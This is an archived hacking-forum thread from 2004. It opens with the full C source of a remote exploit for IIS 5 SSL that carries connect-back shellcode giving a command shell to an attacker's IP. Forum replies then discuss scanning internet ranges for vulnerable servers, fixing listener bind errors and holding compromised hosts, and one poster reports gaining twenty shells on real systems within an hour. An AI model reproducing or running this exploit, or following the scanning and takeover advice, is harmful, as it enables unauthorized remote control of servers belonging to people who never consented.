u know what this does by now, strangely enuff had no luck with it myself...
also anybody know out there how to make it bind to a differnet port?
would i have to change the shellcode?
cuz what i did when the WEBDAV spoilt was out was bind the shellcode to port
80 and quickly setup another way in, but i suppose now this has reverse back shelllcode itll go straight through firewalls with any luck, (im talking about NAT and port blocks), :-) welll i have been down the pub :-)
UGETMeż
lol
/*****************************************************************************/
/* THCIISSLame 0.2 - IIS 5 SSL remote root exploit */
/* Exploit by: Johnny Cyberpunk (jcyberpunk@thc.org) */
/* THC PUBLIC SOURCE MATERIALS */
/* */
/* Bug was found by Internet Security Systems */
/* Reversing credits of the bug go to Halvar Flake */
/* */
/* compile with MS Visual C++ : cl THCIISSLame.c */
/* */
/* This little update uses a connectback shell ! */
/* */
/* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX, dvorak, */
/* scut, stealth, FtR and Random */
/*****************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define jumper "\xeb\x0f"
#define greetings_to_microsoft "\x54\x48\x43\x4f\x57\x4e\x5a\x49\x49\x53\x21"
char sslshit[] = "\x80\x62\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x82\x01\x00\x00\x00";
char shellcode[] =
"\xeb\x25\x7a\x69\x7f\x00\x00\x01\x02\x06\x6c\x59\x6c\x59\xf8"
"\x1d\x9c\xde\x8c\xd1\x4c\x70\xd4\x03\x58\x46\x57\x53\x32\x5f"
"\x33\x32\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\xff\xff\xff\x5d"
"\x83\xed\x2c\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c"
"\xad\x8b\x78\x08\x8d\x5f\x3c\x8b\x1b\x01\xfb\x8b\x5b\x78\x01"
"\xfb\x8b\x4b\x1c\x01\xf9\x8b\x53\x24\x01\xfa\x53\x51\x52\x8b"
"\x5b\x20\x01\xfb\x31\xc9\x41\x31\xc0\x99\x8b\x34\x8b\x01\xfe"
"\xac\x31\xc2\xd1\xe2\x84\xc0\x75\xf7\x0f\xb6\x45\x09\x8d\x44"
"\x45\x08\x66\x39\x10\x75\xe1\x66\x31\x10\x5a\x58\x5e\x56\x50"
"\x52\x2b\x4e\x10\x41\x0f\xb7\x0c\x4a\x8b\x04\x88\x01\xf8\x0f"
"\xb6\x4d\x09\x89\x44\x8d\xd8\xfe\x4d\x09\x75\xbe\xfe\x4d\x08"
"\x74\x17\xfe\x4d\x24\x8d\x5d\x1a\x53\xff\xd0\x89\xc7\x6a\x02"
"\x58\x88\x45\x09\x80\x45\x79\x0c\xeb\x82\x89\xce\x31\xdb\x53"
"\x53\x53\x53\x56\x46\x56\xff\xd0\x89\xc7\x55\x58\x66\x89\x30"
"\x6a\x10\x55\x57\xff\x55\xe0\x8d\x45\x88\x50\xff\x55\xe8\x55"
"\x55\xff\x55\xec\x8d\x44\x05\x0c\x94\x53\x68\x2e\x65\x78\x65"
"\x68\x5c\x63\x6d\x64\x94\x31\xd2\x8d\x45\xcc\x94\x57\x57\x57"
"\x53\x53\xfe\xca\x01\xf2\x52\x94\x8d\x45\x78\x50\x8d\x45\x88"
"\x50\xb1\x08\x53\x53\x6a\x10\xfe\xce\x52\x53\x53\x53\x55\xff"
"\x55\xf0\x6a\xff\xff\x55\xe4";
void usage();
void shell(int sock);
int main(int argc, char *argv[])
{
unsigned int i,sock,sock2,sock3,addr,rc,len=16;
unsigned char *badbuf,*p;
unsigned long offset = 0x6741a1cd;
unsigned long XOR = 0xffffffff;
unsigned short cbport;
unsigned long cbip;
struct sockaddr_in mytcp;
struct hostent * hp;
WSADATA wsaData;
printf("\nTHCIISSLame v0.2 - IIS 5.0 SSL remote root exploit\n");
printf("tested on Windows 2000 Server german/english SP4\n");
printf("by Johnny Cyberpunk (jcyberpunk@thc.org)\n");
if(argc<4 || argc>4)
usage();
badbuf = malloc(327);
memset(badbuf,0,327);
printf("\n[*] building buffer\n");
p = badbuf;
memcpy(p,sslshit,sizeof(sslshit));
p+=sizeof(sslshit)-1;
strcat(p,jumper);
strcat(p,greetings_to_microsoft);
offset^=XOR;
strncat(p,(unsigned char *)&offset,4);
cbport = htons((unsigned short)atoi(argv[3]));
cbip = inet_addr(argv[2]);
memcpy(&shellcode[2],&cbport,2);
memcpy(&shellcode[4],&cbip,4);
strcat(p,shellcode);
if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
{
printf("WSAStartup failed !\n");
exit(-1);
}
hp = gethostbyname(argv[1]);
if (!hp){
addr = inet_addr(argv[1]);
}
if ((!hp) && (addr == INADDR_NONE) )
{
printf("Unable to resolve %s\n",argv[1]);
exit(-1);
}
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock)
{
printf("socket() error...\n");
exit(-1);
}
if (hp != NULL)
memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);
else
mytcp.sin_addr.s_addr = addr;
if (hp)
mytcp.sin_family = hp->h_addrtype;
else
mytcp.sin_family = AF_INET;
mytcp.sin_port=htons(443);
printf("[*] connecting the target\n");
rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));
if(rc==0)
{
send(sock,badbuf,326,0);
printf("[*] exploit send\n");
Sleep(500);
mytcp.sin_addr.s_addr = 0;
mytcp.sin_port=htons((unsigned short)atoi(argv[3]));
sock2=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
rc=bind(sock2,(struct sockaddr *)&mytcp,16);
if(rc!=0)
{
printf("bind error() %d\n",WSAGetLastError());
exit(-1);
}
rc=listen(sock2,1);
if(rc!=0)
{
printf("listen error()\n");
exit(-1);
}
printf("[*] waiting for shell\n");
sock3 = accept(sock2, (struct sockaddr*)&mytcp,&len);
if(sock3)
{
printf("[*] Exploit successful ! Have fun !\n");
printf("[*] --------------------------------------------------------------------\n\n");
shell(sock3);
}
}
else
{
printf("\nCan't connect to ssl port 443!\n");
exit(-1);
}
shutdown(sock,1);
closesocket(sock);
shutdown(sock,2);
closesocket(sock2);
shutdown(sock,3);
closesocket(sock3);
free(badbuf);
exit(0);
}
void usage()
{
unsigned int a;
printf("\nUsage: <victim-host> <connectback-ip> <connectback port>\n");
printf("Sample: THCIISSLame www.lameiss.com 31.33.7.23 31337\n\n");
exit(0);
}
void shell(int sock)
{
int l;
char buf[1024];
struct timeval time;
unsigned long ul[2];
time.tv_sec = 1;
time.tv_usec = 0;
while (1)
{
ul[0] = 1;
ul[1] = sock;
l = select (0, (fd_set *)&ul, NULL, NULL, &time);
if(l == 1)
{
l = recv (sock, buf, sizeof (buf), 0);
if (l <= 0)
{
printf ("bye bye...\n");
return;
}
l = write (1, buf, l);
if (l <= 0)
{
printf ("bye bye...\n");
return;
}
}
else
{
l = read (0, buf, sizeof (buf));
if (l <= 0)
{
printf("bye bye...\n");
return;
}
l = send(sock, buf, l, 0);
if (l <= 0)
{
printf("bye bye...\n");
return;
}
}
}
}
Full Version: Iis5 Ssl V0.2
Try to read the forum...this version(with rev shellcode) was posted before and an explanation of changing the bind port is also available.
geee sorry bromstar, mustuve missed that post
:-)
:-)
Nice exploit 
thanx m8 gonna try this cheers thanx alot m8
thank's... nice exploit...
thanks....nice...
thank u for the binary...
i try to compile it ,with nosuccess.
i try to compile it ,with nosuccess.
very nice exploit !!
any body have chinese version?
any body have chinese version?
| QUOTE (sfzhi @ Apr 23 2004, 04:28 AM) |
| very nice exploit !! any body have chinese version? |
chinese version?? u mean chinese version of that exploit?
thanks for the post keep it up 
| QUOTE (bnhc @ Apr 23 2004, 04:44 AM) | ||
chinese version?? u mean chinese version of that exploit? |
Yes. because i am chinese.
sry for my poor english.
i tested this last night and the damn thing wouldnt work
it compiled ok but every time i run the exploit it just hangs on the 1st IP
i also tried JC`s pre-compiled version and the same thing happens
i guess i should probably have tested it before i made the GUI
anyone else havin probs with this?
it compiled ok but every time i run the exploit it just hangs on the 1st IP
i also tried JC`s pre-compiled version and the same thing happens
i guess i should probably have tested it before i made the GUI
anyone else havin probs with this?
If u dont mind,how toscannt for this Exploit?
Thank u in advance!
Thank u in advance!
| QUOTE (G777 @ Apr 23 2004, 10:29 AM) |
| i tested this last night and the damn thing wouldnt work it compiled ok but every time i run the exploit it just hangs on the 1st IP i also tried JC`s pre-compiled version and the same thing happens i guess i should probably have tested it before i made the GUI anyone else havin probs with this? |
take a look at this code:
printf("[*] waiting for shell\n");
sock3 = accept(sock2, (struct sockaddr*)&mytcp,&len);
if(sock3)
{
printf("[*] Exploit successful ! Have fun !\n");
printf("[*] --------------------------------------------------------------------\n\n");
shell(sock3);
}
}
else
{
printf("\nCan't connect to ssl port 443!\n");
exit(-1);
}
no timeout meaning it waits forever for the shell if you once could connect to port 443. so if the target is already patched it will just sit there and wait for the shell to come which will never come.
| QUOTE (realloader @ Apr 23 2004, 01:35 PM) |
| If u dont mind,how toscannt for this Exploit? Thank u in advance! |
Com'on dude, if you cant figure it out then you dont deserve to use this exploit or any exploit.
It's obvious that you need to scan for ports that IIS listens on. Go and figure it out on yourself which two ports can be scanned for this exploit.
| QUOTE (G777 @ Apr 23 2004, 10:29 AM) |
| i tested this last night and the damn thing wouldnt work it compiled ok but every time i run the exploit it just hangs on the 1st IP i also tried JC`s pre-compiled version and the same thing happens i guess i should probably have tested it before i made the GUI anyone else havin probs with this? |
i had same problem , i set netcat to listen on my selected port and
it no longer hangs but does give a BIND ERROR, ignore bind error
and you will eventually get a shell with netcat if you find a vunerable
target . and vunerables one's are not that easy to find.
hope this helps
| QUOTE (DCLXVI @ Apr 23 2004, 10:47 AM) | ||
i had same problem , i set netcat to listen on my selected port and it no longer hangs but does give a BIND ERROR, ignore bind error and you will eventually get a shell with netcat if you find a vunerable target . and vunerables one's are not that easy to find. hope this helps |
no
you get the bind error because you are having netcat listening on a port where the exploit tries to bind the shell to it. you have to edit the source of this exploit to get it working right.
if you have netcat running on the port you try to bind you will have maybe one result but while you got one result in the shell in try to exploit others you will lose some vulnerable servers.
to fix the problems read up one post from me to see where the problem is
what we have to type in connect back ip and connect back port
HELP
HELP
| QUOTE (binary_hashes @ Apr 23 2004, 10:51 AM) |
| what we have to type in connect back ip and connect back port HELP |
where are all you people comming from again??
unbelieveable
what about your ip address and the port where you want it to bind the shell to?
| QUOTE (Killaloop @ Apr 23 2004, 01:51 PM) |
| no you get the bind error because you are having netcat listening on a port where the exploit tries to bind the shell to it. you have to edit the source of this exploit to get it working right. if you have netcat running on the port you try to bind you will have maybe one result but while you got one result in the shell in try to exploit others you will lose some vulnerable servers. to fix the problems read up one post from me to see where the problem is |
I dont't think I understand what you're saying.. Isnt that the idea of connectback shell?
You set up netcat to listen on port and exploit the target so it connects back to port netcat listens on? So I don't get what that bind error is all about
And about that editing exploit - I think that trial members cant see the thread about editing the exploit. Or at least I can't seem to find it. Maybe someone could point me in the right direction?
Greetz,
Roby
| QUOTE (Killaloop @ Apr 23 2004, 10:51 AM) |
| [/QUOTE] no you get the bind error because you are having netcat listening on a port where the exploit tries to bind the shell to it. you have to edit the source of this exploit to get it working right. if you have netcat running on the port you try to bind you will have maybe one result but while you got one result in the shell in try to exploit others you will lose some vulnerable servers. to fix the problems read up one post from me to see where the problem is |
Killaloop , once you get a shell in netcat , the exploit just hangs again so you don't lose any vunerable servers .
you can also open as many netcat windows as you want,
i tested it with some i knew to be vunerable and got three shells at one go
Thanx for the nice exploit, but which scanner using for this ??
| QUOTE (DCLXVI @ Apr 23 2004, 11:41 AM) |
| Killaloop , once you get a shell in netcat , the exploit just hangs again so you don't lose any vunerable servers . you can also open as many netcat windows as you want, i tested it with some i knew to be vunerable and got three shells at one go |
no it doesn't hang it exits because of bind error, big difference
@Roby
The reverseshell exploit has a listener build into it, it doesn't need netcat listening. that's the reason for the bind error ... netcat listens on the port where the exploit wants to get the shell. Ignore the bind error or close netcat
| QUOTE (-=@cIdBuRn=- @ Apr 23 2004, 01:06 PM) |
| Thanx for the nice exploit, but which scanner using for this ?? |
scan1000 or whatever
Excuse me but i am beind a router and i can't use connectback exploit because the router reject the connections, so have you the first version with bind shell exploit please? or please if you know how make the router accept the connections i am listening ^^
No...i can not scan with scan100.
Here see it:
Usage: scan1000 <Option> <Parameter>
<Option>:
-p <Port|Port-Port> <IP|IP-IP> Scan port
-cgi <IP address> Scan cgi hole
-idq <Start IP> <End IP> Scan .idq hole
-pri <Start IP> <End IP> Scan .printer hole
-apache <Start IP> <End IP> Scan Apache 1.3.x
-apache2 <Start IP> <End IP> Scan Apache 2.x
-apachechunked <Start IP> <End IP> Scan Apache Win32 Chunked
-uni <Start IP> <End IP> Scan unicode hole
-webdav <Start IP> <End IP> Scan Webdav hole
-media <Start IP> <End IP> Scan IIS Media Services
-codered <Start IP> <End IP> Scan codered virus host
-ftp <Start IP> <End IP> [-admin]
-um <IP addr> [Web path] <Message> Modify web files
Example: scan1000 -webdav 192.168.0.1 192.168.0.255
-Credits DOH?
Here see it:
Usage: scan1000 <Option> <Parameter>
<Option>:
-p <Port|Port-Port> <IP|IP-IP> Scan port
-cgi <IP address> Scan cgi hole
-idq <Start IP> <End IP> Scan .idq hole
-pri <Start IP> <End IP> Scan .printer hole
-apache <Start IP> <End IP> Scan Apache 1.3.x
-apache2 <Start IP> <End IP> Scan Apache 2.x
-apachechunked <Start IP> <End IP> Scan Apache Win32 Chunked
-uni <Start IP> <End IP> Scan unicode hole
-webdav <Start IP> <End IP> Scan Webdav hole
-media <Start IP> <End IP> Scan IIS Media Services
-codered <Start IP> <End IP> Scan codered virus host
-ftp <Start IP> <End IP> [-admin]
-um <IP addr> [Web path] <Message> Modify web files
Example: scan1000 -webdav 192.168.0.1 192.168.0.255
-Credits DOH?
stupid...
| QUOTE |
No...i can not scan with scan100. Here see it: Usage: scan1000 <Option> <Parameter> <Option>: -p <Port|Port-Port> <IP|IP-IP> Scan port -cgi <IP address> Scan cgi hole -idq <Start IP> <End IP> Scan .idq hole -pri <Start IP> <End IP> Scan .printer hole -apache <Start IP> <End IP> Scan Apache 1.3.x -apache2 <Start IP> <End IP> Scan Apache 2.x -apachechunked <Start IP> <End IP> Scan Apache Win32 Chunked -uni <Start IP> <End IP> Scan unicode hole -webdav <Start IP> <End IP> Scan Webdav hole -media <Start IP> <End IP> Scan IIS Media Services -codered <Start IP> <End IP> Scan codered virus host -ftp <Start IP> <End IP> [-admin] -um <IP addr> [Web path] <Message> Modify web files Example: scan1000 -webdav 192.168.0.1 192.168.0.255 -Credits DOH? |
lol.. i think yous need another board cleanup
cool
thx 4 the prog
thx 4 the prog
| CODE |
| No...i can not scan with scan100. Here see it: Usage: scan1000 <Option> <Parameter> <Option>: -p <Port|Port-Port> <IP|IP-IP> Scan port -cgi <IP address> Scan cgi hole -idq <Start IP> <End IP> Scan .idq hole -pri <Start IP> <End IP> Scan .printer hole -apache <Start IP> <End IP> Scan Apache 1.3.x -apache2 <Start IP> <End IP> Scan Apache 2.x -apachechunked <Start IP> <End IP> Scan Apache Win32 Chunked -uni <Start IP> <End IP> Scan unicode hole -webdav <Start IP> <End IP> Scan Webdav hole -media <Start IP> <End IP> Scan IIS Media Services -codered <Start IP> <End IP> Scan codered virus host -ftp <Start IP> <End IP> [-admin] -um <IP addr> [Web path] <Message> Modify web files Example: scan1000 -webdav 192.168.0.1 192.168.0.255 |
LOL, you have to scan port 443
by the way great work andydis
| QUOTE (Anarchiste @ Apr 23 2004, 05:02 PM) |
| Excuse me but i am beind a router and i can't use connectback exploit because the router reject the connections, so have you the first version with bind shell exploit please? or please if you know how make the router accept the connections i am listening ^^ |
That is why god created google, my friend:
hxxp://www.security-protocols.com/modules.php?name=News&file=article&sid=1885
Roby
| QUOTE (Demsta @ Apr 23 2004, 02:32 PM) |
| lol.. i think yous need another board cleanup |
talking about me or the person i commented?
Sure it works pretty nice ;
Nice ips & nice domains ; by the way a lot of them are protected/firewalled or LAN's ip ... for the 20 shells i got last hour , i was not able to launch or infiltrate anywhere due to Antivir/FW ; and as i dont want crash anything !
good luck dudes
Nice ips & nice domains ; by the way a lot of them are protected/firewalled or LAN's ip ... for the 20 shells i got last hour , i was not able to launch or infiltrate anywhere due to Antivir/FW ; and as i dont want crash anything !
good luck dudes
Thx Roby i have already found with google but thx
anyone really managed to get a shell with this, how big is the chance, i tried with the autohacker on 6500 ips and i got 0 shells... (filtered) up
ThX man!
Now we can exploit such a server... but how do we secure it?
Any ideas?
We can stop IIS/SSL, but I think the admin notices this?!
What do you think about?
cya
Now we can exploit such a server... but how do we secure it?
Any ideas?
We can stop IIS/SSL, but I think the admin notices this?!
What do you think about?
cya
has microsoft released a patch for this yet ?
yes, they released a patch today...
but you cant install it with only a shell
ciao
but you cant install it with only a shell
ciao
| QUOTE (Killaloop @ Apr 23 2004, 10:42 AM) | ||
take a look at this code: printf("[*] waiting for shell\n"); sock3 = accept(sock2, (struct sockaddr*)&mytcp,&len); if(sock3) { printf("[*] Exploit successful ! Have fun !\n"); printf("[*] --------------------------------------------------------------------\n\n"); shell(sock3); } } else { printf("\nCan't connect to ssl port 443!\n"); exit(-1); } no timeout meaning it waits forever for the shell if you once could connect to port 443. so if the target is already patched it will just sit there and wait for the shell to come which will never come. |
thanx for the tip m8
u can download the patch from here PATCH ME and yes u can patch from CMD just google a bit and u will find the answer
thnx for the patch m8
make some bat with : patch.exe /quiet /forcerestart /o /n /f
that will to the job if you use the correct patch for the correct os
than second, autohacker with 0.2 won't work because idd, no timeout build in
if you can some c you can easely add a timeout like I did
that will to the job if you use the correct patch for the correct os
than second, autohacker with 0.2 won't work because idd, no timeout build in
if you can some c you can easely add a timeout like I did
| CODE |
THCIISSLame v0.2 - IIS 5.0 SSL remote root exploit tested on Windows 2000 Server german/english SP4 by Johnny Cyberpunk (jcyberpunk@thc.org) [*] building buffer [*] connecting the target [*] exploit send [*] waiting for shell [*] Exploit appears to have failed! |
That's what mine does now, really comes in handy.
BTW exploit version 0.2 is definately better than 0.1
Works fine for me, apart from the fact that every shell I have managed to get hasnt allowed me to execute any code...... really not sure why.
I am testing on a mates machine cause I dont have Win2k? Maybe its a setup thing I dont know. back to the the drawing board for me
Its very cool though anyway
I am testing on a mates machine cause I dont have Win2k? Maybe its a setup thing I dont know. back to the the drawing board for me
Its very cool though anyway
What port(s) and such are you guys using? I always get a Bind Error. : (
You have a bind error because you have set netcat or an other programm on the connect back shell port. You don't need netcat, there is a socket in the exploit who listen already the port and give you the shell..good luck 
i don't have any of this problems with v0.1
(never got shell with it...)
(never got shell with it...)
never got shell with it either
K, got some shells now, ty. ; )
I have checked some machine's now but never got a shell, when i exec the prog, it say's:
[*] Building buffer
[*] Connecting to target
[*] Exploit send
[*] Waiting for shell
I first scanned on port 443, after that i did a banner scan on port 80 at the ip's from the port scan. I did this with Scanline (sl -bhpt 80 -f in.txt -o checked.txt). Then i checked the output for Microsoft-IIS/5.0.
Anyone knows if i also could listin netcat on my selected port? because if you do you get the bind error like some of you allready experienced. can you ignor this error and just let netcat do the listening
Can anyone give me a sollution
[*] Building buffer
[*] Connecting to target
[*] Exploit send
[*] Waiting for shell
I first scanned on port 443, after that i did a banner scan on port 80 at the ip's from the port scan. I did this with Scanline (sl -bhpt 80 -f in.txt -o checked.txt). Then i checked the output for Microsoft-IIS/5.0.
Anyone knows if i also could listin netcat on my selected port? because if you do you get the bind error like some of you allready experienced. can you ignor this error and just let netcat do the listening
Can anyone give me a sollution
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
